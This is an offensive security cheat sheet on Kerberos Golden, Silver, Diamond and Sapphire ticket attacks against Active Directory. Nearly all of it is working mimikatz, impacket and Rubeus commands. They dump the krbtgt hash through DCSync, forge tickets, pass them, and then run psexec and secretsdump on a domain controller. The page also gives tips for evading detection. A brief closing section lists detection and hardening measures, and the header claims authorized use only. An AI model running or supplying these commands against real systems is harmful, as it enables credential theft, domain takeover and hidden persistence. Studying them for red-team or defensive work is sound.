โ† All cheat sheets

GOLDEN-SILVER-TICKETS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Post-compromise Kerberos persistence. A Golden Ticket forges a TGT using the
krbtgt hash; a Silver Ticket forges a service ticket (TGS) using a service
account hash. Authorized red-team engagements only.

PREREQUISITES#

Golden:  krbtgt NTLM/AES key + domain SID + domain FQDN (DA-level compromise).
Silver:  target service account's NTLM/AES key (e.g. machine$ or svc) + SID + SPN.
Get krbtgt hash via DCSync:
  mimikatz: lsadump::dcsync /user:krbtgt
  impacket: secretsdump.py -just-dc-user krbtgt DOMAIN/user@dc
Domain SID:  whoami /user  |  Get-ADDomain  |  lookupsid.py

GOLDEN TICKET (mimikatz)#

kerberos::golden /user:Administrator /domain:corp.local ^
  /sid:S-1-5-21-... /krbtgt:<NTLMhash> /ptt
Prefer AES to blend in:  /aes256:<key> instead of /krbtgt.
Blend tips: realistic /user, don't use the default 10-year lifetime
(/startoffset /endin /renewmax), set proper /groups (512 etc).

GOLDEN TICKET (impacket)#

ticketer.py -nthash <krbtgt> -domain-sid S-1-5-21-... -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local
secretsdump.py -k -no-pass corp.local/Administrator@dc.corp.local

SILVER TICKET#

Forge a TGS for one service on one host (stealthier -- never touches the DC):
mimikatz: kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... ^
  /target:host.corp.local /service:cifs /rc4:<machine$ NTLM> /ptt
impacket: ticketer.py -nthash <svc/machine hash> -domain-sid ... -domain corp.local ^
  -spn cifs/host.corp.local Administrator
Useful SPNs: cifs (file), host, http, mssqlsvc, ldap, rpcss, wsman.

DIAMOND / SAPPHIRE (modern evasion)#

Diamond: request a real TGT then modify its PAC with krbtgt key (fewer anomalies
than a fully forged golden). Rubeus: diamond /krbkey:<aes> /ticketuser:... /ticketuserid:...
Sapphire: use a real high-priv PAC via S4U. Both evade "ticket not preceded by AS-REQ".

DETECTION / HARDENING (blue-team note)#

- Rotate krbtgt TWICE (12-24h apart) after any DA compromise.
- Watch 4769 for RC4 where AES expected, TGTs with no prior AS-REQ (4768),
  anomalous ticket lifetimes, and PAC validation failures.
- Tier-0 isolation; limit who can DCSync (replication rights).